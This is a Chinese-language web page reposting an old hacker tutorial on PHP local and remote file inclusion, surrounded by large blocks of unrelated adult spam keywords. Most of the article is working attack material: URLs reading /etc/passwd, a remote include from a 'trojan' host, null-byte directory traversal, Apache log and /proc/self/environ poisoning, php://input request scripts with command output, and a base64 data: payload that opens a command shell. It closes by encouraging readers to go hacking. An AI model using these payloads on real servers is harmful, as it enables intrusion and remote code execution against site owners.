亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長(zhǎng)網(wǎng)

17站長(zhǎng)網(wǎng) 首頁(yè) 安全 腳本攻防 查看內(nèi)容

php包含漏洞替代技術(shù)的方法與介紹,php文件包含漏洞詳解

2022-9-27 08:43| 查看: 2390 |來(lái)源: 互聯(lián)網(wǎng)

================ php包含漏洞替代技術(shù) ================ php開(kāi)發(fā)者們犯得一個(gè)基本的錯(cuò)誤是把一個(gè)不正當(dāng)?shù)淖兞總鬟f給系統(tǒng)函數(shù),特別是include()和require()這兩個(gè)函數(shù)。 這個(gè)常見(jiàn)的錯(cuò)誤導(dǎo)致了眾所周知的遠(yuǎn)程文件包含
================
php包含漏洞替代技術(shù)
================
php開(kāi)發(fā)者們犯得一個(gè)基本的錯(cuò)誤是把一個(gè)不正當(dāng)?shù)淖兞總鬟f給系統(tǒng)函數(shù),特別是include()和require()這兩個(gè)函數(shù)。
這個(gè)常見(jiàn)的錯(cuò)誤導(dǎo)致了眾所周知的遠(yuǎn)程文件包含漏洞和本地文件包含漏洞。在過(guò)去的幾年中,php已經(jīng)開(kāi)始試圖通過(guò)缺省設(shè)置來(lái)消除或限制這種漏洞的所帶來(lái)影響。
但即使是簡(jiǎn)單的本地文件包含,也會(huì)有新的技術(shù)去利用這些漏洞來(lái)導(dǎo)致遠(yuǎn)程命令的執(zhí)行。
================
介紹php包含漏洞
================
文件包含漏洞的要點(diǎn)是要去找到一個(gè)方法來(lái)包含帶有你的php惡意代碼的文件。
include($_GET['content']);
?>
http://target/index.php?content=/etc/pa sswd
http://target/index.php?content=http://trojan/exec.php
這是第一個(gè)例子,它包含了本地文件/etc/pa sswd第二個(gè)例子包含了一個(gè)遠(yuǎn)程文件,這個(gè)遠(yuǎn)程包含文件在大多數(shù)情況下不能使用,因?yàn)閜hp設(shè)置中的allow_url_fopen默認(rèn)是off。
當(dāng)然,通常有此漏洞的php代碼會(huì)比上面的例子更有限制性,通常是通過(guò)在前面加上一個(gè)目錄,防止遠(yuǎn)程文件包含,前面加一個(gè)文件擴(kuò)展名來(lái)限制可以包含哪些類(lèi)型的文件。
include("pages/".$_GET['content'].".php");
?>
http://target/index.php?content=../../../etc/pa sswd%00
.../的使用允許目錄橫向風(fēng)格的操作,使你可以操作代碼中預(yù)定目錄以外的目錄的文件。
如果php設(shè)置中open_basedir為on,它將會(huì)阻止你繞過(guò)過(guò)多的目錄。
網(wǎng)站的開(kāi)發(fā)者有可能也會(huì)使用一些函數(shù)來(lái)過(guò)濾掉來(lái)自用戶(hù)提交的惡意數(shù)據(jù),但并非總是如此。
空字節(jié)字符%00(\0)終止字符串,來(lái)切斷在它之后提交的任何東西,即是當(dāng)magic_quotes_gpc 默認(rèn)為on的時(shí)候,也可以逃過(guò)。
在http://ush.it網(wǎng)站中有一篇名為《PHP文件系統(tǒng)的攻擊媒介》提供了可能的方法來(lái)應(yīng)付空字節(jié)字符。
php腳本安全也可能取決于像$_GLOBAL[]或$_SERVER[]等的變量,像最近被發(fā)現(xiàn)的phplist的漏洞(phplist是一款國(guó)外的Email程序),例子為
http://target/phplist/admin/?_SERVER[ConfigFile]=/etc/pa sswd
==================
本地文件包含致遠(yuǎn)程代碼執(zhí)行
==================
一次你找到一個(gè)本地包含漏洞,你需要找到一個(gè)方法去把你的惡意php代碼插入一個(gè)文件中,大量的技術(shù)在過(guò)去的幾年中出現(xiàn)。
有一種在服務(wù)日志中去注入php代碼的技術(shù)比上面這些包含漏洞要出現(xiàn)的晚。
它是有可能的去把我們的代碼插入http請(qǐng)求的頭部,然后包含Apache的access_log日志文件(它可能會(huì)進(jìn)行一些測(cè)試去找到access_log)。
考慮一下這個(gè)例子,在Mac OS X的Apache/PHP默認(rèn)配置下,寫(xiě)一個(gè)腳本去發(fā)送一個(gè)請(qǐng)求可能是必須的,因?yàn)闉g覽器可能會(huì)對(duì)一些字符進(jìn)行轉(zhuǎn)義。
$a = fsockopen("localhost",80);
fwrite($a,"GET / HTTP/1.1\r\n".
"Host: localhost\r\n".
"Connection: Close\r\n\r\n");
fclose($a);
?>
https://www.jb51.net /index.php?content=/var/log/httpd/access_log&cmd=id
另一種方法是包括了Apache/PHP進(jìn)程的環(huán)境變量的/proc/ self/environ文件。
如果我們將惡意代碼插入U(xiǎn)ser-Agent 的頭部,這些代碼會(huì)出現(xiàn)在那個(gè)文件里,所以遠(yuǎn)程執(zhí)行代碼是可能的。
/proc/ self/environ必須是可讀的
$a = fsockopen("localhost",80);
fwrite($a,"GET /../../../../proc/ self/environ HTTP/1.1\r\n".
"User-Agent: \r\n".
"Host: localhost\r\n".
"Connection: Close\r\n\r\n");
fclose($a);
?>
=================
Php封裝包含漏洞
====================
利用php的include函數(shù)的另一種方法是利用php封裝(http://www.php.net/wrappers.php)。這個(gè)例子將使用PHP輸入,從一個(gè)HTTP POST請(qǐng)求的原始數(shù)據(jù)并執(zhí)行它:
漏洞代碼:
include($_GET['content']);
?>
我們的請(qǐng)求:
$request = "";
$req = "POST /index.php?content=php://input
HTTP/1.1\r\n".
"Host: localhost\r\n".
"Content-type: text/html\r\n".
"Content-length: ".strlen($request)."\r\n".
"Connection: Close\r\n\r\n".
"$request \r\n\r\n";
$a = fsockopen("10.0.2.2",80);
fwrite($a,$req);
echo $req;
while (!feof($a)){echo fgets($a, 128);}
fclose($a);
?>
得到的結(jié)果:uid=33(www-data) gid=33(www-data) groups=33(www-data)
這個(gè)例子的前提是allow_url_include和allow_fopen_include兩個(gè)選項(xiàng)設(shè)置為ON,在這種情況下,標(biāo)準(zhǔn)的遠(yuǎn)程文件包含是可能的。
這個(gè)方法的優(yōu)點(diǎn)是它不依賴(lài)于外部?jī)?chǔ)存文件服務(wù)器。
cr0w-at.blogspot.com提到另一種技術(shù)使用"數(shù)據(jù):"封裝:
index.php?content=data:,?&c=dir
或者base64編碼過(guò)的:
index.php?content=data:;base64, \PD9waHAgc3lzdGVtKCRfR0VUW2NdKTsgPz4=&c=dir
============
總結(jié)
============
這些方法大多都不是新的,并沒(méi)有表現(xiàn)出缺陷或在PHP語(yǔ)言本身的局限性。這些問(wèn)題通常可以通過(guò)強(qiáng)大的輸入驗(yàn)證,常識(shí)編碼,和一些預(yù)防更嚴(yán)格的服務(wù)器配置。
然而,許多問(wèn)題并不是很快能消失的(SQL注入等),所以開(kāi)心的去黑吧。
*本文中闡述的漏洞不會(huì)存在于Silic Group的網(wǎng)站
*如果你足夠細(xì)心,你會(huì)發(fā)現(xiàn)文中很多關(guān)鍵字,例如敏感路徑、敏感函數(shù),都被加了個(gè)空格
*是因?yàn)榉⻊?wù)器的防火墻會(huì)攔截此類(lèi)關(guān)鍵字,檢測(cè)到關(guān)鍵字時(shí)服務(wù)器就會(huì)顯示501/503錯(cuò)誤
*這就是BlackBap.Org所在服務(wù)器攔截的原因
*本站管理員注:-)
作者:Anonymous
本文最后更新于 2022-9-27 08:43,某些文章具有時(shí)效性,若有錯(cuò)誤或已失效,請(qǐng)?jiān)诰W(wǎng)站留言或聯(lián)系站長(zhǎng):17tui@17tui.com
·END·
站長(zhǎng)網(wǎng)微信號(hào):w17tui,關(guān)注站長(zhǎng)、創(chuàng)業(yè)、關(guān)注互聯(lián)網(wǎng)人 - 互聯(lián)網(wǎng)創(chuàng)業(yè)者營(yíng)銷(xiāo)服務(wù)中心

免責(zé)聲明:本站部分文章和圖片均來(lái)自用戶(hù)投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!

17站長(zhǎng)網(wǎng)微信二維碼

始終以前瞻性的眼光聚焦站長(zhǎng)、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長(zhǎng)轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營(yíng)銷(xiāo)服務(wù),與站長(zhǎng)一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!

掃一掃,關(guān)注站長(zhǎng)網(wǎng)微信

大家都在看

    熱門(mén)排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        2024国产精品| 欧美国产精品专区| 亚洲三级在线播放| 久久电影网站中文字幕| 日本精品裸体写真集在线观看 | 久久精工是国产品牌吗| 色菇凉天天综合网| 亚洲男人的天堂网| 99久久精品免费观看| 久久久久久电影| 国内外精品视频| 精品国一区二区三区| 麻豆精品一区二区三区| 欧美一区二区私人影院日本| 亚洲综合偷拍欧美一区色| 91免费国产在线| 亚洲自拍偷拍麻豆| 欧美日韩在线精品一区二区三区激情| 国产精品久久久久aaaa| 成人激情午夜影院| 亚洲精品国久久99热| 91国产视频在线观看| 亚洲高清不卡在线| 日韩欧美三级在线| 韩国精品久久久| 亚洲丝袜制服诱惑| 欧美日韩一区 二区 三区 久久精品| 亚洲尤物视频在线| 日韩免费看的电影| 成人精品视频网站| 五月婷婷综合网| 日韩欧美一区二区三区在线| 国产宾馆实践打屁股91| 一区二区三区精品| 久久新电视剧免费观看| 色婷婷av一区| 国产一区二区精品久久| 一区二区在线观看视频在线观看| 欧美日韩和欧美的一区二区| 日韩国产精品91| 国产精品毛片大码女人| 3d成人动漫网站| 99精品国产91久久久久久| 午夜不卡av免费| 国产精品国产馆在线真实露脸| 欧美日韩免费一区二区三区视频| 国产酒店精品激情| 三级一区在线视频先锋 | 中文字幕在线一区| 欧美一区二区三区视频在线观看| 懂色av噜噜一区二区三区av| 肉肉av福利一精品导航| 一区二区三区在线视频播放| 久久综合五月天婷婷伊人| 欧美日韩国产成人在线免费| 99在线精品观看| 成人动漫视频在线| 东方aⅴ免费观看久久av| 国模冰冰炮一区二区| 秋霞午夜av一区二区三区| 亚洲私人影院在线观看| 国产精品久久久久久久久动漫| 欧美tickling网站挠脚心| 欧美一区二区三区视频免费播放| 欧亚一区二区三区| 欧美日韩精品一区二区在线播放 | 蜜臀a∨国产成人精品| 一片黄亚洲嫩模| 偷拍亚洲欧洲综合| 日本人妖一区二区| 激情深爱一区二区| 国产精品中文字幕一区二区三区| 免费观看久久久4p| 国产激情91久久精品导航 | 午夜久久久久久久久| 日韩精品一级中文字幕精品视频免费观看 | 欧美色偷偷大香| 欧美一区二区高清| 久久日一线二线三线suv| 国产日产亚洲精品系列| 亚洲日本欧美天堂| 日本成人在线一区| 成人爽a毛片一区二区免费| 色8久久人人97超碰香蕉987| 欧美区视频在线观看| 国产欧美日韩另类一区| 亚洲午夜在线视频| 国产一区 二区| 欧美日韩综合不卡| 国产农村妇女毛片精品久久麻豆 | 欧美三级韩国三级日本一级| 精品国产一区二区国模嫣然| 亚洲色图清纯唯美| 国内欧美视频一区二区| 欧美在线视频你懂得| 亚洲国产高清aⅴ视频| 亚洲午夜一区二区三区| 韩国毛片一区二区三区| 欧美亚洲精品一区| 亚洲免费在线观看视频| 久久99在线观看| 717成人午夜免费福利电影| 亚洲黄色av一区| 97精品久久久午夜一区二区三区| 欧美精品一区男女天堂| 蜜桃视频在线观看一区二区| av在线播放一区二区三区| 国产午夜一区二区三区| 精品一区二区精品| 欧美xxxxxxxx| 国产一区二区精品在线观看| 日韩欧美一区二区视频| 首页国产欧美日韩丝袜| 欧美精品久久99| 日本不卡高清视频| 精品入口麻豆88视频| 国产一区二区在线视频| 久久精品亚洲一区二区三区浴池| 日本aⅴ亚洲精品中文乱码| 日韩欧美一区二区免费| 国产在线不卡一卡二卡三卡四卡| 日韩精品一区国产麻豆| 国产精品一二三区| 自拍偷拍亚洲欧美日韩| 欧美日韩国产天堂| 国模娜娜一区二区三区| 18成人在线视频| 欧美乱熟臀69xxxxxx| 国产精品一品二品| 亚洲综合清纯丝袜自拍| 日韩一区二区精品葵司在线 | 日韩理论片在线| 欧美一区二区三区小说| 成人精品视频.| 日本午夜一区二区| 国产精品视频一二| 日韩一区二区免费在线观看| 99热国产精品| 国内外成人在线| 亚洲第一福利视频在线| 国产精品美日韩| 精品国一区二区三区| 91丨九色丨蝌蚪富婆spa| 精品中文字幕一区二区小辣椒 | 国产婷婷色一区二区三区四区| 在线精品视频免费播放| 国产mv日韩mv欧美| 久久66热偷产精品| 亚洲女人小视频在线观看| 国产精品色哟哟网站| 欧美一级日韩不卡播放免费| 欧美性色黄大片| 91黄色在线观看| 色乱码一区二区三区88| 国产精品羞羞答答xxdd | 国产精品超碰97尤物18| 中文字幕免费观看一区| 欧美精品久久久久久久多人混战 | 国产精品一区二区不卡| 国产一区二区三区精品视频| 日韩精品国产欧美| 伊人色综合久久天天人手人婷| 国产精品每日更新| 亚洲欧美另类综合偷拍| 国产欧美日韩在线观看| 成人欧美一区二区三区视频网页| 中文字幕中文字幕一区二区| 国产精品久久久久影院亚瑟| 日本一区二区三区视频视频| 中文字幕日韩一区二区| 亚洲黄色小视频| 裸体在线国模精品偷拍| 国产在线一区二区| 国产成人h网站| 色偷偷久久一区二区三区| 欧美另类久久久品| 欧美成人精品福利| 国产喂奶挤奶一区二区三区| 国产亚洲成av人在线观看导航| 中文字幕不卡的av| 一区二区三区不卡视频在线观看 | 精品日韩一区二区三区| 亚洲欧美影音先锋| 麻豆国产精品一区二区三区| 99久久久国产精品| 日韩视频国产视频| 亚洲在线中文字幕| 久久99久久久久| 91精品91久久久中77777| 日韩精品一区二区三区视频 | 久久久99久久| 蜜臀a∨国产成人精品| 在线日韩av片| 中文字幕中文字幕一区| 日本aⅴ精品一区二区三区 | 国产一区日韩二区欧美三区| 欧美精品免费视频| 亚洲aⅴ怡春院| 欧美丰满少妇xxxxx高潮对白| 亚洲精品欧美激情|